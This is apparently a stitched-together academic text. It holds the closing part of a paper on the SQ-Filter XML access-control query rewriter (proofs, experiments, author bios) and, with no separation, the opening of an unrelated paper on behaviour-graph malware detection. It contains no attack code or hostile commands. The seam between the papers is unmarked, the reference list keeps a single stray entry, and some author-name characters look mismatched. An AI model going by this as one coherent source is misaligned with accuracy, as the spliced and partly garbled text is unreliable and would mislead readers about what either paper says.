A predicate is a qualifying expression that is used to select a subset of the nodes of a valid XML instance. Therefore, the predicates of the ACRs or of a query are appended to a safe rewritten query. There are three cases. Case 1: Query with predicates vs. ACRs without predicates: The safe rewritten query is the same as in the case where no predicates are used in the query or the ACRs, because the scope of a query without predicates includes the scope of the query with predicates. Case 2: Query without predicates vs. ACRs with predicates: Although both positive and negative ACRs are ANCESTOR ACRs for a query of Type 1, the query is affected by any step with predicates in the ACRs, which filters the selected nodes. Thus, the query should be transformed into a safe query rather than be rejected. Case 3: Query with predicates vs. ACRs with predicates: This is similar to Case 2. Let us extend the \( Q \) INTERSECT \( ACR \) algorithm to handle predicates. Recall the query \( Q_2 \) and the two ACRs, \( R_3 \) and \( R_6 \). By the ACR-F, \( R_3 \) is a DESCENDANT positive ACR of \( Q_2 \), while \( R_6 \) is a DESCENDANT negative ACR, which is Type 4.

\[
\begin{align*}
Q_2: & \text{//open_auction[@id<100]} \\
R_3: & \text{//open_auction[quantity]/seller} \\
R_6: & \text{/site/*/open_auction[@id>50]/seller[@person="chang"]}
\end{align*}
\]

The standard XPath expression between \( Q_2 \) and \( R_3 \) is \( R_3 \), and the standard XPath expression between \( Q_2 \) and \( R_6 \) is \( R_6 \).
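As described above, the predicates of the query and of the ACRs are appended to the rewritten query, and predicates that qualify the same step are joined with "and". A minimal sketch, assuming (this representation is not specified in the paper) that the QA's hash table keys each predicate by the PRE value of the step it qualifies:

```python
# Illustrative sketch: merging the predicate tables of a query and an ACR.
# Predicates landing on the same step (same PRE key) are joined with "and",
# mirroring the [@id<100 and @id>50] example in the text.

def merge_predicates(q_preds, acr_preds):
    """q_preds / acr_preds: {pre_of_step: ["@id<100", ...]}"""
    merged = {}
    for preds in (q_preds, acr_preds):
        for pre, exprs in preds.items():
            merged.setdefault(pre, []).extend(exprs)
    # render each step's predicate list as a single XPath predicate
    return {pre: "[" + " and ".join(exprs) + "]" for pre, exprs in merged.items()}

m = merge_predicates({30: ["@id<100"]}, {30: ["@id>50"], 33: ['@person="chang"']})
print(m[30], m[33])  # -> [@id<100 and @id>50] [@person="chang"]
```

The merged predicates are then attached to the corresponding steps of the immediate rewritten query.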
Thus, each immediate rewritten query is as follows:

Immediate \( Q_2 \) INTERSECT \( R_3 \): /site/open_auctions/open_auction/seller

Immediate \( Q_2 \) INTERSECT \( R_6 \): /site/open_auctions/open_auction/seller

By the QA (see section 4.2), the QE obtains a hash table of each predicate's content and position information of the query. Thus, the extended algorithm appends the predicates of both the ACR and \( Q \) to the immediate rewritten query. The predicates of \( Q_2 \) (i.e., (30, @id, <, 100)) and \( R_3 \) (i.e., (30, quantity, , )) are appended to the immediate \( Q_2 \) INTERSECT \( R_3 \):

\[ Q_2 \text{ INTERSECT } R_3: \text{/site/open_auctions/open_auction[@id<100][quantity]/seller} \]

The predicates of \( Q_2 \) (i.e., (30, @id, <, 100)) and \( R_6 \) (i.e., (30, @id, >, 50) and (33, @person, =, "chang")) are appended to the immediate \( Q_2 \) INTERSECT \( R_6 \):

\[ Q_2 \text{ INTERSECT } R_6: \text{/site/open_auctions/open_auction[@id<100 and @id>50]/seller[@person="chang"]} \]

The final rewritten safe query \( Q_2' \) is as follows:

\( Q_2' = (Q_2 \text{ INTERSECT } R_3) \text{ EXCEPT } (Q_2 \text{ INTERSECT } R_6) \)
\( = (\text{/site/open_auctions/open_auction[@id<100][quantity]/seller}) \text{ EXCEPT } \)
\( \quad (\text{/site/open_auctions/open_auction[@id<100 and @id>50]/seller[@person="chang"]}) \)

5. CORRECTNESS

The goal of the SQ-Filter system is to transform an unsafe query into a safe one, as shown in section 4.4:

\( Q' = Q \text{ INTERSECT } (ACR^{+}s_Q \text{ EXCEPT } ACR^{-}s_Q) \)
\( \ \ = (Q \text{ INTERSECT } ACR^{+}s_Q) \text{ EXCEPT } (Q \text{ INTERSECT } ACR^{-}s_Q), \)

where \( ACR^{+}s_Q \subseteq ACR^{+} \) and \( ACR^{-}s_Q \subseteq ACR^{-} \). (5)

The \((Q \text{ INTERSECT } ACR^{+}s_Q)\) set operation excludes unauthorized parts from the query. The \((Q \text{ INTERSECT } ACR^{-}s_Q)\) set operation finds the access-denied parts of the query.
Although the semantics of each result query differ, both set operations are the same from the processing point of view. We define a symbol "\(\cap\)" between two XPath expressions, \(p_i\) and \(p_j\).

**Definition 8** \([p_i \cap p_j]\) \(p_i \cap p_j\) is the XPath expression(s) representing the nodes specified by both \(p_i\) and \(p_j\). If the preorder value of \(p_i\) is less than that of \(p_j\) and the postorder value of \(p_i\) is greater than that of \(p_j\), then

\[ Pr_{p_i \cap p_j} = Pr_{p_j}, \quad Po_{p_i \cap p_j} = Po_{p_j}. \]

If the preorder value of \(p_i\) is equal to that of \(p_j\) and the postorder value of \(p_i\) is equal to that of \(p_j\), then

\[ Pr_{p_i \cap p_j} = Pr_{p_j} = Pr_{p_i}, \quad Po_{p_i \cap p_j} = Po_{p_j} = Po_{p_i}. \]

**Theorem 2** The QUERY EXECUTOR algorithm always generates the correct and safe rewritten query when \(Q\) and the \(ACR\)s are limited to XPath expressions without predicates.

**Proof:** Let \(Q\) and \(ACR\) be a query and an access control rule, respectively, and let \(Q'\) be the rewritten query. By Definition 8, \(Q \cap ACR\) is the XPath expression representing the nodes specified by both \(Q\) and \(ACR\). Since each target node of a DTD structure has a unique path, generating the correct and safe rewritten query amounts to showing

\[ Pr_{Q'} = Pr_{Q \cap ACR}, \quad Po_{Q'} = Po_{Q \cap ACR}. \]

By the ACR-F, as shown in section 4.3, an \(ACR\) for \(Q\) is one of an ANCESTOR ACR, a DESCENDANT ACR, or a SELF ACR. The proof follows a case-by-case analysis of each of them. By Definition 5 (ANCESTOR ACR), \(Pr_Q > Pr_{ACR}\), \(Po_Q < Po_{ACR}\), \(Pr_{Q'} = Pr_Q\), and \(Po_{Q'} = Po_Q\); by Definition 8, \(Pr_{Q \cap ACR} = Pr_Q\) and \(Po_{Q \cap ACR} = Po_Q\); hence \(Pr_{Q'} = Pr_{Q \cap ACR}\) and \(Po_{Q'} = Po_{Q \cap ACR}\).
By Definition 6 (DESCENDANT ACR), \(Pr_Q < Pr_{ACR}\), \(Po_Q > Po_{ACR}\), \(Pr_{Q'} = Pr_{ACR}\), and \(Po_{Q'} = Po_{ACR}\); by Definition 8, \(Pr_{Q \cap ACR} = Pr_{ACR}\) and \(Po_{Q \cap ACR} = Po_{ACR}\); hence \(Pr_{Q'} = Pr_{Q \cap ACR}\) and \(Po_{Q'} = Po_{Q \cap ACR}\).

By Definition 7 (SELF ACR), \(Pr_{Q'} = Pr_Q = Pr_{ACR}\) and \(Po_{Q'} = Po_Q = Po_{ACR}\); by Definition 8, \(Pr_{Q \cap ACR} = Pr_Q = Pr_{ACR}\) and \(Po_{Q \cap ACR} = Po_Q = Po_{ACR}\); hence \(Pr_{Q'} = Pr_{Q \cap ACR}\) and \(Po_{Q'} = Po_{Q \cap ACR}\).

**Theorem 3** The QUERY EXECUTOR algorithm always generates the correct and safe rewritten query when \(Q\) and the \(ACR\)s are XPath expressions with predicates.

**Proof:** For an XPath expression (\(pp\)) with predicates, we remove the predicates to construct an XPath expression (\(p\)) without predicates. The special relation is as follows:

$$Pr_{pp} = Pr_p, \quad Po_{pp} = Po_p, \quad pp \cap p = pp. \hspace{1cm} (6)$$

Let a query with predicates, the query without predicates, an access control rule with predicates, and the access control rule without predicates be \(Q\), \(Q^*\), \(ACR\), and \(ACR^*\), respectively. Then we have

$$Pr_Q = Pr_{Q^*}, \quad Po_Q = Po_{Q^*}, \quad Q \cap Q^* = Q, \hspace{1cm} (7)$$
$$Pr_{ACR} = Pr_{ACR^*}, \quad Po_{ACR} = Po_{ACR^*}, \quad ACR \cap ACR^* = ACR. \hspace{1cm} (8)$$

Let \(Q' = (Q \cap ACR)\) and \(Q'^* = (Q^* \cap ACR^*)\) be the outputs of the QE. By Eq. (6), \(Q' = Q' \cap Q'^*\). Thus, \(Q' = Q \cap ACR \cap Q^* \cap ACR^*\). By Eqs. (7) and (8), \(Q' = Q \cap ACR\).
\(\square\)

6. EXPERIMENTS

We implemented the SQ-Filter and the SQ-NFA (combining the SQ-Filter with the NFA technique) in the Java programming language. We then compared their performance with that of the QFilter [11] on synthetic data sets generated by the publicly available XMark benchmark [21] for each experiment.¹

6.1 Experiment I: Correctness of Detecting Rejection Queries

Many queries on XML data have path expressions with "//" axes. With the shared NFA method, which lacks the metadata of the DTD, the process of rewriting queries may be incorrect because more states are traversed to process "*" and "//". To demonstrate this fact, we made 20 intentional rejection XPath queries for each query type and measured how many of these rejection queries were filtered. A rejection query is a query that is always denied. Fig. 10 shows that while the QFilter's rate of filtering rejection queries starting with the "//" axis is 0%, the SQ-Filter and the SQ-NFA completely filter the rejection queries. Without order information among elements, if a user query contains //-child and a shared NFA does not contain a /-child or //-child state, the navigation of the shared NFA runs to each final state. If the answer model is "Answer-as-nodes", the query is rejected. However, if the answer model is "Answer-as-sub-trees", the QFilter appends //-child to each final state.

---
¹ The experiments were performed on a Pentium IV 2.66GHz with 1 GB main memory, running MS-Windows XP.
As a result, the output of the query \(Q_2\) may be an incorrectly rewritten query as follows:

$$((\text{/site/regions/*/item[@location="LA"]//open_auction[@id<100]}) \text{ UNION}$$
$$(\text{/site/people/person[name="chang"]//open_auction[@id<100]}) \text{ UNION}$$
$$(\text{/site/open_auctions/open_auction[@id<100]}) \text{ UNION}$$
$$(\text{//open_auction[quantity][@id<100]/seller})) \text{ EXCEPT}$$
$$((\text{/site/regions/*/item/payment//open_auction[@id<100]}) \text{ UNION}$$
$$(\text{/site/people/person/creditcard//open_auction[@id<100]}) \text{ UNION}$$
$$(\text{/site/*/open_auction[@id<100 and @id>50]}))$$

### 6.2 Experiment II: Estimating the Average Processing Time Without Predicates

Second, we made 100 XPath queries for each query type. As in section 3.3, for strict data security, we used "most specific precedence" as the propagation policy and the "closed policy" as the decision policy. By Definition 1, it is impossible for any node that is not in the scope of positive ACRs to have negative ACRs. Therefore, for each query, we randomly made 4 positive ACRs at higher-level nodes and 8 negative ACRs at lower-level nodes. We then measured the average processing time for the output (rejection or rewritten query) of the SQ-Filter, the SQ-NFA, and the QFilter. Before estimating the average processing time, we measured the speed of each filter construction. The SQ-Filter or SQ-NFA construction time refers to the hash table generation time of a DTD, as shown in Fig. 1 (c). The QFilter construction time means the generation time of the two shared NFAs (i.e., for negative and positive ACRs). Fig. 11 shows each construction time. This shows that the metadata of a DTD has minimal overhead. In the case of queries with only "/" axes, as shown in Fig. 12, the SQ-Filter, the SQ-NFA, and the QFilter show little difference. In the case of queries with "//" axes, the SQ-Filter and the SQ-NFA can rewrite queries faster than the QFilter, which includes the exhaustive navigation of the NFA.
Third, we measured the total number of ACRs used and the average processing time per 30, 50, 100, 200, 300, and 500 random queries. For the verification of the ACR-F algorithm, which eliminates unnecessary ACRs, we made more ACRs (7 positive and 18 negative) for each query. The QFilter uses all ACRs for each query, so the total number of ACRs is 750 per 30 queries. By the ACR-F in section 4.3, however, the SQ-Filter and the SQ-NFA use 102 ACRs per 30 queries, as shown in Fig. 13. By the QE using the PPS metadata, as shown in Fig. 1 (c), the SQ-Filter and the SQ-NFA can rewrite queries with the "*" wildcard and the "//" axis faster than the QFilter. The result is shown in Fig. 14. Each processing time includes the construction time shown in Fig. 11.

6.3 Experiment III: Handling Predicates

We measured the processing time of handling predicates for the outputs of the SQ-Filter system. The result is shown in Fig. 15. Each processing time excludes the construction time shown in Fig. 11. From this, we can see that the simple predicate-handling method adds little overhead.

7. CONCLUSION

The SQ-Filter system for XML access control enforcement described in this paper exploits the tree properties encoded in the PRE/POST plane to eliminate unnecessary access control rules for a user query and to reject unauthorized queries ahead of rewriting. In addition, the SQ-Filter system exploits the simple hash tree of a DTD to find an actual node for a "*" node and a parent node of a node with the descendant-or-self axis ("//"), and to rewrite an unsafe query into a safe one with the help of operations combining two sets of nodes. By the QUERY ANALYZER component and the Prune_TN algorithm, we could completely filter the rejection queries. By the ACR FINDER component, we could eliminate all the unnecessary ACRs for a query.
By the QUERY EXECUTOR component, we could produce a rewritten safe query by extending/eliminating query tree nodes and combining sets of nodes with the set operations. Our mechanism is a pre-processing one, which is independent of the underlying XML database engine. Thus, the techniques proposed in this paper could be built on top of any XML DBMS. In the future, we will consider complex predicate optimization. Since our approach is not entirely suitable for system specification, we plan to extend our techniques to handle dynamic, well-formed XML.

REFERENCES

18. XQuery 1.0 and XPath 2.0, http://www.w3.org/TR/xquery-full-text/.

Changwoo Byun (邊秀又) received the B.S., M.S., and Ph.D. degrees in the Department of Computer Science and Engineering from Sogang University, Seoul, Korea, in 1999, 2001, and 2007, respectively. Since September 2007, he has been working in the Department of Computer Systems and Engineering of Inha Technical College. His areas of research include data stream management systems, role-based access control models, access control for distributed systems, access control for XML data, XML transaction management, and ubiquitous security.

Seog Park (朴錫) is a Professor of Computer Science at Sogang University. He received the B.S. degree in Computer Science from Seoul National University in 1978, and the M.S. and Ph.D. degrees in Computer Science from the Korea Advanced Institute of Science and Technology (KAIST) in 1980 and 1983, respectively. Since 1983, he has been working in the Department of Computer Science and Engineering, Sogang University. His major research areas are database security, real-time systems, data warehouses, digital libraries, multimedia database systems, role-based access control, Web databases, and data stream management systems. Dr. Park is a member of the IEEE Computer Society, the ACM, and the Korean Institute of Information Scientists and Engineers.
Effective and Efficient Malware Detection at the End Host Clemens Kolbitsch∗, Paolo Milani Comparetti∗, Christopher Kruegel‡, Engin Kirda§, Xiaoyong Zhou†, and XiaoFeng Wang† ∗Secure Systems Lab, TU Vienna {ck,pmilani}@seclab.tuwien.ac.at ‡UC Santa Barbara chris@cs.ucsb.edu §Institute Eurecom, Sophia Antipolis kirda@eurecom.fr †Indiana University at Bloomington {zhou,xw7}@indiana.edu Abstract Malware is one of the most serious security threats on the Internet today. In fact, most Internet problems such as spam e-mails and denial of service attacks have malware as their underlying cause. That is, computers that are compromised with malware are often networked together to form botnets, and many attacks are launched using these malicious, attacker-controlled networks. With the increasing significance of malware in Internet attacks, much research has concentrated on developing techniques to collect, study, and mitigate malicious code. Without doubt, it is important to collect and study malware found on the Internet. However, it is even more important to develop mitigation and detection techniques based on the insights gained from the analysis work. Unfortunately, current host-based detection approaches (i.e., anti-virus software) suffer from ineffective detection models. These models concentrate on the features of a specific malware instance, and are often easily evadable by simple obfuscation or polymorphism. Also, detectors that check for the presence of a sequence of system calls exhibited by a malware instance are often evadable by system call reordering. In order to address the shortcomings of ineffective models, several dynamic detection approaches have been proposed that aim to identify the behavior exhibited by a malware family. Although promising, these approaches are unfortunately too slow to be used as real-time detectors on the end host, and they often require cumbersome virtual machine technology. 
In this paper, we propose a novel malware detection approach that is both effective and efficient, and thus, can be used to replace or complement traditional anti-virus software at the end host. Our approach first analyzes a malware program in a controlled environment to build a model that characterizes its behavior. Such models describe the information flows between the system calls essential to the malware’s mission, and therefore, cannot be easily evaded by simple obfuscation or polymorphic techniques. Then, we extract the program slices responsible for such information flows. For detection, we execute these slices to match our models against the runtime behavior of an unknown program. Our experiments show that our approach can effectively detect running malicious code on an end user’s host with a small overhead. 1 Introduction Malicious code, or malware, is one of the most pressing security problems on the Internet. Today, millions of compromised web sites launch drive-by download exploits against vulnerable hosts [35]. As part of the exploit, the victim machine is typically used to download and execute malware programs. These programs are often bots that join forces and turn into a botnet. Botnets [15] are then used by miscreants to launch denial of service attacks, send spam mails, or host scam pages. Given the malware threat and its prevalence, it is not surprising that a significant amount of previous research has focused on developing techniques to collect, study, and mitigate malicious code. For example, there have been studies that measure the size of botnets [37], the prevalence of malicious web sites [35], and the infection of executables with spyware [31]. Also, a number of server-side [4, 43] and client-side honeypots [50] were introduced that allow analysts and researchers to gather malware samples in the wild. In addition, there exist tools that can execute unknown samples and monitor their behavior [6, 28, 53, 54].
Some tools [6, 53] provide reports that summarize the activities of unknown programs at the level of Windows API or system calls. Such reports can be evaluated to find clusters of samples that behave similarly [5, 7] or to classify the type of observed, malicious activity [39]. Other tools [54] incorporate data flow into the analysis, which results in a more comprehensive view of a program’s activity in the form of taint graphs. While it is important to collect and study malware, this is only a means to an end. In fact, it is crucial that the insight obtained through malware analysis is translated into detection and mitigation capabilities that allow one to eliminate malicious code running on infected machines. Considerable research effort was dedicated to the extraction of network-based detection models. Such models are often manually-crafted signatures loaded into intrusion detection systems [33] or bot detectors [20]. Other models are generated automatically by finding common tokens in network streams produced by malware programs (typically, worms) [32, 41]. Finally, malware activity can be detected by spotting anomalous traffic. For example, several systems try to identify bots by looking for similar connection patterns [19, 38]. While network-based detectors are useful in practice, they suffer from a number of limitations. First, a malware program has many options to render network-based detection very difficult. The reason is that such detectors cannot observe the activity of a malicious program directly but have to rely on artifacts (the traffic) that this program produces. For example, encryption can be used to thwart content-based techniques, and blending attacks [17] can change the properties of network traffic to make it appear legitimate. Second, network-based detectors cannot identify malicious code that does not send or receive any traffic. 
Host-based malware detectors have the advantage that they can observe the complete set of actions that a malware program performs. It is even possible to identify malicious code before it is executed at all. Unfortunately, current host-based detection approaches have significant shortcomings. An important problem is that many techniques rely on ineffective models. Ineffective models are models that do not capture intrinsic properties of a malicious program and its actions but merely pick up artifacts of a specific malware instance. As a result, they can be easily evaded. For example, traditional anti-virus (AV) programs mostly rely on file hashes and byte (or instruction) signatures [46]. Unfortunately, obfuscation techniques and code polymorphism make it straightforward to modify these features without changing the actual semantics (the behavior) of the program [11]. Other examples are models that capture the sequence of system calls that a specific malware program executes. When these system calls are independent, it is easy to change their order or add irrelevant calls, thus invalidating the captured sequence. In an effort to overcome the limitations of ineffective models, researchers have sought ways to capture the malicious activity that is characteristic of a malware program (or a family). On one hand, this has led to detectors [10, 13, 25] that use sophisticated static analysis to identify code that is semantically equivalent to a malware template. Since these techniques focus on the actual semantics of a program, it is not enough for a malware sample to use obfuscation and polymorphic techniques to alter its appearance. The problem with static techniques is that static binary analysis is difficult [30]. This difficulty is further exacerbated by runtime packing and self-modifying code. Moreover, the analysis is costly, and thus, not suitable for replacing AV scanners that need to quickly scan large numbers of files.
Dynamic analysis is an alternative approach to model malware behavior. In particular, several systems [22, 54] rely on the tracking of dynamic data flows (tainting) to characterize malicious activity in a generic fashion. While detection results are promising, these systems incur a significant performance overhead. Also, a special infrastructure (virtual machine with shadow memory) is required to keep track of the taint information. As a result, static and dynamic analysis approaches are often employed in automated malware analysis environments (for example, at anti-virus companies or by security researchers), but they are too inefficient to be deployed as detectors on end hosts. In this paper, we propose a malware detection approach that is both effective and efficient, and thus, can be used to replace or complement traditional AV software at the end host. For this, we first generate effective models that cannot be easily evaded by simple obfuscation or polymorphic techniques. More precisely, we execute a malware program in a controlled environment and observe its interactions with the operating system. Based on these observations, we generate fine-grained models that capture the characteristic, malicious behavior of this program. This analysis can be expensive, as it needs to be run only once for a group of similar (or related) malware executables. The key of the proposed approach is that our models can be efficiently matched against the runtime behavior of an unknown program. This allows us to detect malicious code that exhibits behavior that has been previously associated with the activity of a certain malware strain. The main contributions of this paper are as follows: - We automatically generate fine-grained (effective) models that capture detailed information about the behavior exhibited by instances of a malware family. These models are built by observing a malware sample in a controlled environment. 
- We have developed a scanner that can efficiently match the activity of an unknown program against our behavior models. To achieve this, we track dependencies between system calls without requiring expensive taint analysis or special support at the end host. - We present experimental evidence that demonstrates that our approach is feasible and usable in practice. 2 System Overview The goal of our system is to effectively and efficiently detect malicious code at the end host. Moreover, the system should be general and not incorporate a priori knowledge about a particular malware class. Given the freedom that malware authors have when crafting malicious code, this is a challenging problem. To attack this problem, our system operates by generating detection models based on the observation of the execution of malware programs. That is, the system executes and monitors a malware program in a controlled analysis environment. Based on this observation, it extracts the behavior that characterizes the execution of this program. The behavior is then automatically translated into detection models that operate at the host level. Our approach allows the system to quickly detect and eliminate novel malware variants. However, it is reactive in the sense that it must observe a certain, malicious behavior before it can properly respond. This introduces a small delay between the appearance of a new malware family and the availability of appropriate detection models. We believe that this is a trade-off that is necessary for a general system that aims to detect and mitigate malicious code with a priori unknown behavior. In some sense, the system can be compared to the human immune system, which also reacts to threats by first detecting intruders and then building appropriate antibodies. Also, it is important to recognize that it is not required to observe every malware instance before it can be detected. 
Instead, the proposed system abstracts (to some extent) program behavior from a single, observed execution trace. This allows the detection of all malware instances that implement similar functionality. Modeling program behavior. To model the behavior of a program and its security-relevant activity, we rely on system calls. Since system calls capture the interactions of a program with its environment, we assume that any relevant security violation is visible as one or more unintended interactions. Of course, a significant amount of research has focused on modeling legitimate program behavior by specifying permissible sequences of system calls [18, 48]. Unfortunately, these techniques cannot be directly applied to our problem. The reason is that malware authors have a large degree of freedom in rearranging the code to achieve their goals. For example, it is very easy to reorder independent system calls or to add irrelevant calls. Thus, we cannot represent suspicious activity as system call sequences that we have observed. Instead, a more flexible representation is needed. This representation must capture true relationships between system calls but allow independent calls to appear in any order. For this, we represent program behavior as a behavior graph where nodes are (interesting) system calls. An edge is introduced from a node \( x \) to node \( y \) when the system call associated with \( y \) uses as argument some output that is produced by system call \( x \). That is, an edge represents a data dependency between system calls \( x \) and \( y \). Moreover, we only focus on a subset of interesting system calls that can be used to carry out malicious activity. At a conceptual level, the idea of monitoring a piece of malware and extracting a model for it bears some resemblance to previous signature generation systems [32, 41]. In both cases, malicious activity is recorded, and this activity is then used to generate detection models. 
In the case of signature generation systems, network packets sent by worms are compared to traffic from benign applications. The goal is to extract tokens that are unique to worm flows and, thus, can be used for network-based detection. At a closer look, however, the differences between previous work and our approach are significant. While signature generation systems extract specific, byte-level descriptions of malicious traffic (similar to virus scanners), the proposed approach targets the semantics of program executions. This requires different means to observe and model program behavior. Moreover, our techniques to identify malicious activity and then perform detection differ as well. Making detection efficient. In principle, we can directly use the behavior graph to detect malicious activity at the end host. For this, we monitor the system calls that an unknown program issues and match these calls with nodes in the graph. When enough of the graph has been matched, we conclude that the running program exhibits behavior that is similar to previously-observed, malicious activity. At this point, the running process can be terminated and its previous, persistent modifications to the system can be undone. Unfortunately, there is a problem with the previously sketched approach. The reason is that, for matching system calls with nodes in the behavior graph, we need to have information about data dependencies between the arguments and return values of these system calls. Recall that an edge from node \( x \) to \( y \) indicates that there is a data flow from system call \( x \) to \( y \). As a result, when observing \( x \) and \( y \), it is not possible to declare a match with the behavior graph \( x \rightarrow y \). Instead, we need to know whether \( y \) uses values that \( x \) has produced. Otherwise, independent system calls might trigger matches in the behavior graph, leading to an unacceptably high number of false positives. 
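To make the false-positive risk concrete, consider a minimal sketch (our own illustration with hypothetical traces; the Windows system call names are used purely as examples): two programs can issue the identical system call sequence, yet only one exhibits the data flow \( x \rightarrow y \).

```python
# Two hypothetical system-call traces. Each entry is
# (call_name, argument, return_value).
benign = [("NtOpenFile", "config.ini", 7),
          ("NtWriteFile", 9, None)]   # writes to an unrelated handle
malware = [("NtOpenFile", "self.exe", 7),
           ("NtWriteFile", 7, None)]  # writes using the opened handle

def naive_match(trace):
    """Sequence-only matching: fires on both traces."""
    names = [name for name, _, _ in trace]
    return names == ["NtOpenFile", "NtWriteFile"]

def dependency_match(trace):
    """Also require the data flow: the write must use the open's output."""
    (_, _, handle), (_, arg, _) = trace
    return naive_match(trace) and arg == handle

assert naive_match(benign) and naive_match(malware)   # false positive
assert not dependency_match(benign)                   # dependency rules it out
assert dependency_match(malware)
```

The sequence-only matcher flags the benign trace as well, which is exactly the false-positive problem that motivates tracking data dependencies.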
Previous systems have proposed dynamic data flow tracking (tainting) to determine dependencies between system calls. However, tainting incurs a significant performance overhead and requires a special environment (typically, a virtual machine with shadow memory). Hence, taint-based systems are usually only deployed in analysis environments but not at end hosts. In this paper, we propose an approach that allows us to detect previously-seen data dependencies by monitoring only system calls and their arguments. This allows efficient identification of data flows without requiring expensive tainting and special environments (virtual machines). Our key idea to determine whether there is a data flow between a pair of system calls \( x \) and \( y \) that is similar to a previously-observed data flow is as follows: Using the observed data flow, we extract those parts of the program (the instructions) that are responsible for reading the input and transforming it into the corresponding output (a kind of program slice [52]). Based on this program slice, we derive a symbolic expression that represents the semantics of the slice. In other words, we extract an expression that can essentially pre-compute the expected output, based on some input. In the simplest case, when the input is copied to the output, the symbolic expression captures the fact that the input value is identical to the output value. Of course, more complicated expressions are possible. In cases where it is not possible to determine a closed symbolic expression, we can use the program slice itself (i.e., the sequence of program instructions that transforms an input value into its corresponding output, according to the functionality of the program). Given a program slice or the corresponding symbolic expression, an unknown program can be monitored. Whenever this program invokes a system call \( x \), we extract the relevant arguments and return value. 
This value is then used as input to the slice or symbolic expression, computing the expected output. Later, whenever a system call \( y \) is invoked, we check its arguments. When the value of the system call argument is equal to the previously-computed, expected output, then the system has detected the data flow. Using data flow information that is computed in the previously-described fashion, we can increase the precision of matching observed system calls against the behavior graph. That is, we can make sure that a graph with a relationship \( x \rightarrow y \) is matched only when we observe \( x \) and \( y \), and there is a data flow between \( x \) and \( y \) that corresponds to the semantics of the malware program that is captured by this graph. As a result, we can perform more accurate detection and reduce the false positive rate. 3 System Details In this section, we provide more details on the components of our system. In particular, we first discuss how we characterize program activity via behavior graphs. Then, we introduce our techniques to automatically extract such graphs from observing binaries. Finally, we present our approach to match the actions of an unknown binary to previously-generated behavior graphs. 3.1 Behavior Graphs: Specifying Program Activity As a first step, we require a mechanism to describe the activity of programs. According to previous work [12], such a specification language for malicious behaviors has to satisfy three requirements: First, a specification must not constrain independent operations. The second requirement is that a specification must relate dependent operations. Third, the specification must only contain security-relevant operations. The authors in [12] propose malspecs as a means to capture program behavior. 
A malicious specification (malspec) is a directed acyclic graph (DAG) with nodes labeled using system calls from an alphabet \( \Sigma \) and edges labeled using logic formulas in a logic \( \mathcal{L}_{dep} \). Clearly, malspecs satisfy the first two requirements. That is, independent nodes (system calls) are not connected, while related operations are connected via a series of edges. The paper also mentions a function \( \text{IsTrivialComponent} \) that can identify and remove parts of the graph that are not security-relevant (to meet the third requirement). For this work, we use a formalism called behavior graphs. Behavior graphs share similarities with malspecs. In particular, we also express program behavior as directed acyclic graphs where nodes represent system calls. However, we do not have unconstrained system call arguments, and the semantics of edges is somewhat different. We define a system call \( s \in \Sigma \) as a function that maps a set of input arguments \( a_1, \ldots, a_n \) into a set of output values \( o_1, \ldots, o_k \). For each input argument \( a_i \) of a system call, the behavior graph captures where the value of this argument is derived from. For this, we use a function \( f_{a_i} \in F \). Before we discuss the nature of the functions in \( F \) in more detail, we first describe where a value for a system call can be derived from. A system call value can come from three possible sources (or a mix thereof): First, it can be derived from the output argument(s) of previous system calls. Second, it can be read from the process address space (typically, the initialized data section – the \( \text{.data} \) segment). Third, it can be produced by the immediate argument of a machine instruction. As mentioned previously, a function is used to capture the input to a system call argument \( a_i \). 
More precisely, the function \( f_{a_i} \) for an argument \( a_i \) is defined as \( f_{a_i} : x_1, x_2, \ldots, x_n \rightarrow y_i \), where each \( x_i \) represents the output \( o_j \) of a previous system call. The values that are read from memory are part of the function body, represented by \( l(\text{addr}) \). When the function is evaluated, \( l(\text{addr}) \) is replaced with the value read from the corresponding address in the address space of the monitored process. This technique is needed to ensure that values that are loaded from memory (for example, keys) are not constant in the specification, but read from the process under analysis. Of course, our approach implies that the memory addresses of key data structures do not change between (polymorphic) variants of a certain malware family. In fact, this premise is confirmed by a recent observation that data structures are stable between different samples that belong to the same malware class [14]. Finally, constant values produced by instructions (through immediate operands) are implicitly encoded in the function body. Consider the case in which a system call argument \( a_i \) is the constant value 0, for example, produced by a \texttt{push \$0} instruction. Here, the corresponding function is a constant function with no arguments \( f_{a_i} : \rightarrow 0 \). Note that a function \( f \in F \) can be expressed in two different forms: as a (symbolic) formula or as an algorithm (more precisely, as a sequence of machine instructions – this representation is used in case the relation is too complex for a mathematical expression). Whenever an input argument \( a_i \) for system call \( y \) depends on some output \( o_j \) produced by system call \( x \), we introduce an edge from the node that corresponds to \( x \) to the node that corresponds to \( y \). Thus, edges encode dependencies (i.e., temporal relationships) between system calls. 
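The three kinds of value sources can be illustrated with small Python closures (a sketch of the formalism only, not the system's actual encoding; `read_process_memory` and the addresses are hypothetical stand-ins):

```python
# Hypothetical snapshot of the monitored process's memory.
PROCESS_MEMORY = {0x403000: 0x41}

def read_process_memory(addr):
    """Stand-in for l(addr): read addr from the process under analysis."""
    return PROCESS_MEMORY[addr]

# f_a : -> 0  (constant produced by an immediate operand, e.g. push $0)
f_const = lambda: 0

# f_a : x1 -> x1  (argument copied from the output of a previous call)
f_copy = lambda x1: x1

# f_a : x1 -> x1 + l(0x403000)  (mixes a prior output with a memory value;
# l(addr) is evaluated against the analyzed process, not baked in as a constant)
f_mixed = lambda x1: x1 + read_process_memory(0x403000)

assert f_const() == 0
assert f_copy(42) == 42
assert f_mixed(1) == 0x42
```

Evaluating `l(addr)` lazily, as in `f_mixed`, is what keeps memory-resident values (such as keys) out of the specification itself.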
Given the previous discussion, we can define behavior graphs \( G \) more formally as: \( G = (V, E, F, \delta) \), where: - \( V \) is the set of vertices, each representing a system call \( s \in \Sigma \) - \( E \) is the set of edges, \( E \subseteq V \times V \) - \( F \) is the set of functions \( \bigcup f : x_1, x_2, \ldots, x_n \rightarrow y \), where each \( x_i \) is an output argument \( o_j \) of a system call \( s \in \Sigma \) - \( \delta \), which assigns a function \( f_i \) to each system call argument \( a_i \) Intuitively, a behavior graph encodes relationships between system calls. That is, the functions \( f_i \) for the arguments \( a_i \) of a system call \( s \) determine how these arguments depend on the outputs of previous calls, as well as program constants and memory values. Note that these functions allow one to \textit{pre-compute} the expected arguments of a system call. Consider a behavior graph \( G \) where an input argument \( a \) of a system call \( s_t \) depends on the outputs of two previous calls \( s_p \) and \( s_q \). Thus, there is a function \( f_a \) associated with \( a \) that has two inputs. Once we observe \( s_p \) and \( s_q \), we can use the outputs \( o_p \) and \( o_q \) of these system calls and plug them into \( f_a \). At this point, we know the expected value of \( a \), assuming that the program execution follows the semantics encoded in the behavior 